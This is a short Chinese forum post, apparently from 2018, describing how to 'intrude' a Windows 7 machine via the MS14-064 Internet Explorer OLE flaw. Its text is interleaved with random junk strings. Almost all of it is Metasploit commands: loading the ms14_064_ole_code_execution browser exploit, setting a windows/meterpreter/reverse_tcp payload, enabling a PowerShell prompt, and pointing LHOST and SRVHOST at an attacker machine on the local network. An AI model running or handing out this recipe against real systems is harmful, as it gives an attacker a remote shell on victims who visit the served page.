找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1253|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% V, ?* _" h! | p$ L 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 3 h3 B- Z9 d# h

2 c$ A9 |/ ~! b z

7 d& k5 i8 j9 E" ~: i0 G 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 8 {; M {! L3 U9 x/ k' U

! P, ]! k# d' g

: \* j: ?4 W! e' P 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp U' \/ e2 H5 H* x' B7 d0 |

& {0 ^' g$ |7 }+ l6 K5 @, S6 _

$ p6 A7 u* h7 j' ?/ U" S7 K+ Y$ d             set AllowPowershellPrompt true ' h' O; T# }+ ?3 |- b7 a7 w' T

; @8 z8 q1 q' c$ [# E$ {

: H- J9 n3 Z& E: B5 e             Set LHOST 192.168.0.109 ' m) x0 n/ }7 @

% }' [+ G! w0 F8 ]+ H

* L( Y1 f7 O3 H) Z             set SRVHOST 192.168.0.109 4 [$ T0 Z1 X% B6 ]

. `4 l9 S: G) w N2 S( e- {: @ l

; i* g! Y3 [" U4 e# [3 X             Set uripath share + |& u7 g% ^$ H `+ n0 D5 a

' b; _6 T7 L+ L; ]( D& a& i# H

) A, F5 k4 p# K0 e$ e             Set srvport 80 . g# D7 |, m+ T& {9 F8 N

7 e$ \2 \: U6 [* {; A) Y9 O

, T6 u( S! t& e( E8 S+ T0 f: H, ~6 C   2 X5 `$ i" U5 X8 b( {

0 g2 H( M( o2 S, G, ]/ x0 ~5 \2 q1 j

7 p* [# ^8 K" X   ; f0 l, T- k! |

! S$ s$ w$ n6 ~6 S7 R( O

+ E+ j9 _9 `5 m9 h   2 K) o2 u/ @# G8 F2 o: R% s. ]

: R% ~+ \$ F6 h. ~: n. I1 z

& b5 _' a0 m: V' T+ G4 `  : v2 U9 s8 T% \4 Q9 N- C _

9 j" U0 @ X# p/ }5 R

* v3 H8 p" i- q7 F) H q$ C B   ! P" G4 g; v4 |

7 n8 V; I# \. O1 o) e }$ f

- a `. D2 l7 d! z, r 下面我们来访问本地地址如图:; V6 p+ R5 J) h" ^+ g

3 i2 K5 n7 w1 B2 f( o4 Z

& T+ [7 L+ m' w" d& H# r  ! T; z& f9 L0 v

2 {* f K+ H# |6 T, V- R# E

) ]) d3 x; X9 u1 p% y; {5 x8 G  # |+ e* [/ p' C- z4 f5 M P9 `7 c

4 M; v! V+ t' b. d3 e( A

# ~# a* B. U* ?1 }' r ; \. }$ u% W, n, M& v0 k' j0 ]

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表